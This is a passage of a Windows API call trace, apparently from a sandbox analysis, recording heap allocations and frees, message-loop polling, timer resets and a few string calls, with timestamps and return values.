HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a648d0 | out: hHeap=0x2af0000) returned 1 [0085.828] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a63c40 | out: hHeap=0x2af0000) returned 1 [0085.828] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a649a8 | out: hHeap=0x2af0000) returned 1 [0085.828] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71318 | out: hHeap=0x2af0000) returned 1 [0085.828] lstrlenW (lpString="20") returned 2 [0085.828] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a63d48 | out: hHeap=0x2af0000) returned 1 [0085.828] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71328 | out: hHeap=0x2af0000) returned 1 [0085.829] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a64108 | out: hHeap=0x2af0000) returned 1 [0085.829] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a64828 | out: hHeap=0x2af0000) returned 1 [0085.829] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a64a80 | out: hHeap=0x2af0000) returned 1 [0085.829] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a712b8 | out: hHeap=0x2af0000) returned 1 [0085.829] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a64810 | out: hHeap=0x2af0000) returned 1 [0085.829] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a647b0 | out: hHeap=0x2af0000) returned 1 [0085.829] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71368 | out: hHeap=0x2af0000) returned 1 [0085.829] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a648b8 | out: hHeap=0x2af0000) returned 1 [0085.829] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71288 | out: hHeap=0x2af0000) returned 1 [0085.829] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a649a8 | out: hHeap=0x2af0000) returned 1 [0085.829] PeekMessageW (in: lpMsg=0x8ceed8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceed8) returned 0 [0085.829] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e640 | out: hHeap=0x2af0000) returned 1 [0085.829] PeekMessageW (in: lpMsg=0x8ceed8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceed8) returned 0 [0085.829] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a712a8 | out: hHeap=0x2af0000) returned 1 [0085.829] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a648b8 | out: hHeap=0x2af0000) returned 1 [0085.829] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a649a8 | out: hHeap=0x2af0000) returned 1 [0085.829] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5dfa8 | out: hHeap=0x2af0000) returned 1 [0085.829] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a64a68 | out: hHeap=0x2af0000) returned 1 [0085.829] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a64960 | out: hHeap=0x2af0000) returned 1 [0085.829] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a76360 | out: hHeap=0x2af0000) returned 1 [0085.829] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a712f8 | out: hHeap=0x2af0000) returned 1 [0085.829] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a76518 | out: hHeap=0x2af0000) returned 1 [0085.829] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a647c8 | out: hHeap=0x2af0000) returned 1 [0085.829] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a64870 | out: hHeap=0x2af0000) returned 1 [0085.829] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a711e8 | out: hHeap=0x2af0000) returned 1 [0085.829] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a76568 | out: hHeap=0x2af0000) returned 1 [0085.829] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a648a0 | out: hHeap=0x2af0000) returned 1 [0085.829] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a64a38 | out: hHeap=0x2af0000) returned 1 [0085.829] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a765b8 | out: hHeap=0x2af0000) returned 1 [0085.829] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71308 | out: hHeap=0x2af0000) returned 1 [0085.829] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a76658 | out: hHeap=0x2af0000) returned 1 [0085.829] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a649c0 | out: hHeap=0x2af0000) returned 1 [0085.829] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a711c8 | out: hHeap=0x2af0000) returned 1 [0085.829] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a646c0 | out: hHeap=0x2af0000) returned 1 [0085.830] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a64a20 | out: hHeap=0x2af0000) returned 1 [0085.830] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a647f8 | out: hHeap=0x2af0000) returned 1 [0085.830] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a64a08 | out: hHeap=0x2af0000) returned 1 [0085.830] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a730d8 | out: hHeap=0x2af0000) returned 1 [0085.830] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a64600 | out: hHeap=0x2af0000) returned 1 [0085.830] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a730a8 | out: hHeap=0x2af0000) returned 1 [0085.830] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a64a98 | out: hHeap=0x2af0000) returned 1 [0085.830] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a648b8 | out: hHeap=0x2af0000) returned 1 [0085.830] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a649a8 | out: hHeap=0x2af0000) returned 1 [0085.830] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a647b0 | out: hHeap=0x2af0000) returned 1 [0085.830] CharUpperBuffW (in: lpsz="A4300005D31", cchLength=0xb | out: lpsz="A4300005D31") returned 0xb [0085.830] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a762e8 | out: hHeap=0x2af0000) returned 1 [0085.830] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71338 | out: hHeap=0x2af0000) returned 1 [0085.830] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71208 | out: hHeap=0x2af0000) returned 1 [0085.830] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71388 | out: hHeap=0x2af0000) returned 1 [0085.830] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a64810 | out: hHeap=0x2af0000) returned 1 [0085.830] PeekMessageW (in: lpMsg=0x8ceed8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceed8) returned 0 [0085.830] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a64a20 | out: hHeap=0x2af0000) returned 1 [0085.830] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a647b0 | out: hHeap=0x2af0000) returned 1 [0085.830] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a76568 | out: hHeap=0x2af0000) returned 1 [0085.830] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a711c8 | out: hHeap=0x2af0000) returned 1 [0085.830] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a64a20 | out: hHeap=0x2af0000) returned 1 [0085.830] PeekMessageW (in: lpMsg=0x8ceed8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceed8) returned 0 [0085.830] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a712c8 | out: hHeap=0x2af0000) returned 1 [0085.830] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71348 | out: hHeap=0x2af0000) returned 1 [0085.830] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a648d0 | out: hHeap=0x2af0000) returned 1 [0085.830] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a64828 | out: hHeap=0x2af0000) returned 1 [0085.830] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a64a20 | out: hHeap=0x2af0000) returned 1 [0085.830] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a711d8 | out: hHeap=0x2af0000) returned 1 [0085.831] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71388 | out: hHeap=0x2af0000) returned 1 [0085.831] PeekMessageW (in: lpMsg=0x8ceed8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceed8) returned 0 [0085.831] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71328 | out: hHeap=0x2af0000) returned 1 [0085.831] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a712f8 | out: hHeap=0x2af0000) returned 1 [0085.831] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71248 | out: hHeap=0x2af0000) returned 1 [0085.831] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a64120 | out: hHeap=0x2af0000) returned 1 [0085.831] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a64108 | out: hHeap=0x2af0000) returned 1 [0085.831] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a64600 | out: hHeap=0x2af0000) returned 1 [0085.831] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a646c0 | out: hHeap=0x2af0000) returned 1 [0085.831] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a63d48 | out: hHeap=0x2af0000) returned 1 [0085.831] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71368 | out: hHeap=0x2af0000) returned 1 [0085.831] lstrlenW (lpString="20") returned 2 [0085.831] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ec3a0 | out: hHeap=0x2af0000) returned 1 [0085.831] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71388 | out: hHeap=0x2af0000) returned 1 [0085.831] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ec0d0 | out: hHeap=0x2af0000) returned 1 [0085.831] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a63c40 | out: hHeap=0x2af0000) returned 1 [0085.831] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a64a20 | out: hHeap=0x2af0000) returned 1 [0085.831] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a712c8 | out: hHeap=0x2af0000) returned 1 [0085.831] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a648d0 | out: hHeap=0x2af0000) returned 1 [0085.831] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a64828 | out: hHeap=0x2af0000) returned 1 [0085.831] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71208 | out: hHeap=0x2af0000) returned 1 [0085.831] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ec220 | out: hHeap=0x2af0000) returned 1 [0085.831] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71228 | out: hHeap=0x2af0000) returned 1 [0085.831] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ec130 | out: hHeap=0x2af0000) returned 1 [0085.831] PeekMessageW (in: lpMsg=0x8ceed8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceed8) returned 0 [0085.831] PeekMessageW (in: lpMsg=0x8ceed8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceed8) returned 0 [0085.831] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71248 | out: hHeap=0x2af0000) returned 1 [0085.831] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a711e8 | out: hHeap=0x2af0000) returned 1 [0085.831] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71268 | out: hHeap=0x2af0000) returned 1 [0085.831] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ec3a0 | out: hHeap=0x2af0000) returned 1 [0085.831] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ec130 | out: hHeap=0x2af0000) returned 1 [0085.831] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ec4c0 | out: hHeap=0x2af0000) returned 1 [0085.832] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ec5e0 | out: hHeap=0x2af0000) returned 1 [0085.832] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ec340 | out: hHeap=0x2af0000) returned 1 [0085.832] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71328 | out: hHeap=0x2af0000) returned 1 [0085.832] lstrlenW (lpString="31") returned 2 [0085.832] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ec4f0 | out: hHeap=0x2af0000) returned 1 [0085.832] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71268 | out: hHeap=0x2af0000) returned 1 [0085.832] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ec658 | out: hHeap=0x2af0000) returned 1 [0085.832] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ec0d0 | out: hHeap=0x2af0000) returned 1 [0085.832] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ec2c8 | out: hHeap=0x2af0000) returned 1 [0085.832] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71258 | out: hHeap=0x2af0000) returned 1 [0085.832] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ec220 | out: hHeap=0x2af0000) returned 1 [0085.832] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ec2e0 | out: hHeap=0x2af0000) returned 1 [0085.832] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a712c8 | out: hHeap=0x2af0000) returned 1 [0085.832] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ec2c8 | out: hHeap=0x2af0000) returned 1 [0085.832] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71398 | out: hHeap=0x2af0000) returned 1 [0085.832] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ec3a0 | out: hHeap=0x2af0000) returned 1 [0085.832] PeekMessageW (in: lpMsg=0x8ceed8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceed8) returned 0 [0085.832] PeekMessageW (in: lpMsg=0x8ceed8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceed8) returned 0 [0085.868] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a712e8 | out: hHeap=0x2af0000) returned 1 [0085.868] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a711c8 | out: hHeap=0x2af0000) returned 1 [0085.868] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71328 | out: hHeap=0x2af0000) returned 1 [0085.868] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ec0d0 | out: hHeap=0x2af0000) returned 1 [0085.868] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ec2e0 | out: hHeap=0x2af0000) returned 1 [0085.906] lstrlenW (lpString="20") returned 2 [0085.906] PeekMessageW (in: lpMsg=0x8ceed8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceed8) returned 1 [0085.906] TranslateMessage (lpMsg=0x8ceed8) returned 0 [0085.906] DispatchMessageW (lpMsg=0x8ceed8) returned 0x0 [0085.906] KillTimer (hWnd=0xa02be, uIDEvent=0x1) returned 1 [0085.906] SetTimer (hWnd=0xa02be, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0085.906] PeekMessageW (in: lpMsg=0x8ceed8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceed8) returned 0 [0085.906] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ec40 | out: hHeap=0x2af0000) returned 1 [0085.906] PeekMessageW (in: lpMsg=0x8ceed8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceed8) returned 0 [0085.906] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71228 [0085.906] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ec220 [0085.906] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71228 | out: hHeap=0x2af0000) returned 1 [0085.906] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ec2c8 [0085.906] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ec220 | out: hHeap=0x2af0000) returned 1 [0085.906] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ec340 [0085.906] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ec2c8 | out: hHeap=0x2af0000) returned 1 [0085.906] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5dfa8 | out: hHeap=0x2af0000) returned 1 [0085.906] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a64a80 | out: hHeap=0x2af0000) returned 1 [0085.906] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a649c0 | out: hHeap=0x2af0000) returned 1 [0085.907] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a76518 | out: hHeap=0x2af0000) returned 1 [0085.907] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71308 | out: hHeap=0x2af0000) returned 1 [0085.907] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a763b0 | out: hHeap=0x2af0000) returned 1 [0085.907] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a648b8 | out: hHeap=0x2af0000) returned 1 [0085.907] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a64810 | out: hHeap=0x2af0000) returned 1 [0085.907] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a712a8 | out: hHeap=0x2af0000) returned 1 [0085.907] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a76568 | out: hHeap=0x2af0000) returned 1 [0085.907] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a647c8 | out: hHeap=0x2af0000) returned 1 [0085.907] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a647b0 | out: hHeap=0x2af0000) returned 1 [0085.907] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a765b8 | out: hHeap=0x2af0000) returned 1 [0085.907] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71318 | out: hHeap=0x2af0000) returned 1 [0085.907] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a762e8 | out: hHeap=0x2af0000) returned 1 [0085.907] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a64a08 | out: hHeap=0x2af0000) returned 1 [0085.907] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71378 | out: hHeap=0x2af0000) returned 1 [0085.907] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a64a68 | out: hHeap=0x2af0000) returned 1 [0085.907] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a64a50 | out: hHeap=0x2af0000) returned 1 [0085.907] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a647f8 | out: hHeap=0x2af0000) returned 1 [0085.907] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a64a98 | out: hHeap=0x2af0000) returned 1 [0085.907] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a711f8 | out: hHeap=0x2af0000) returned 1 [0085.907] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a64960 | out: hHeap=0x2af0000) returned 1 [0085.907] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a730a8 | out: hHeap=0x2af0000) returned 1 [0085.907] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a64a38 | out: hHeap=0x2af0000) returned 1 [0085.907] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ec130 [0085.907] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ec340 | out: hHeap=0x2af0000) returned 1 [0085.907] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ec2c8 [0085.907] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ec0d0 [0085.907] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a730a8 [0085.907] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a76518 [0085.907] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ec2e0 [0085.907] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71338 [0085.907] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ec2e0 | out: hHeap=0x2af0000) returned 1 [0085.907] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a762e8 [0085.907] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ec3a0 [0085.907] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ec220 [0085.907] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71318 [0085.908] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ec2c8 | out: hHeap=0x2af0000) returned 1 [0085.908] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a76658 [0085.908] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a711e8 [0085.908] CharUpperBuffW (in: lpsz="A4300005D31", cchLength=0xb | out: lpsz="A4300005D31") returned 0xb [0085.908] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a76658 | out: hHeap=0x2af0000) returned 1 [0085.908] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a711e8 | out: hHeap=0x2af0000) returned 1 [0085.908] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ec2c8 [0085.908] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a71398 [0085.908] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ec2e0 [0085.908] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ec340 [0085.908] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71248 [0085.908] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a711a8 [0085.908] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a711a8 | out: hHeap=0x2af0000) returned 1 [0085.908] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ec5e0 [0085.908] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71248 | out: hHeap=0x2af0000) returned 1 [0085.908] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x29ec658 [0085.908] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a76568 [0085.908] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ec4f0 [0085.908] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a711c8 [0085.908] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ec4f0 | out: hHeap=0x2af0000) returned 1 [0085.908] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a76658 [0085.908] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ec4c0 [0085.908] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ec4f0 [0085.908] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5dfa8 [0085.908] PeekMessageW (in: lpMsg=0x8ceed8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceed8) returned 0 [0085.908] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ec820 [0085.908] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a711f8 [0085.908] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ec820 | out: hHeap=0x2af0000) returned 1 [0085.908] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a765b8 [0085.908] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ec820 [0085.908] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ecb20 [0085.909] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71328 [0085.909] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a76270 [0085.909] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ed210 [0085.909] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a712f8 [0085.909] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ed210 | out: hHeap=0x2af0000) returned 1 [0085.909] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a763b0 [0085.909] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ed210 [0085.909] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29eda80 [0085.909] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a765b8 | out: hHeap=0x2af0000) returned 1 [0085.909] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a711f8 | out: hHeap=0x2af0000) returned 1 [0085.909] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ec820 | out: hHeap=0x2af0000) returned 1 [0085.909] PeekMessageW (in: lpMsg=0x8ceed8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceed8) returned 0 [0085.909] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a765b8 [0085.909] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) 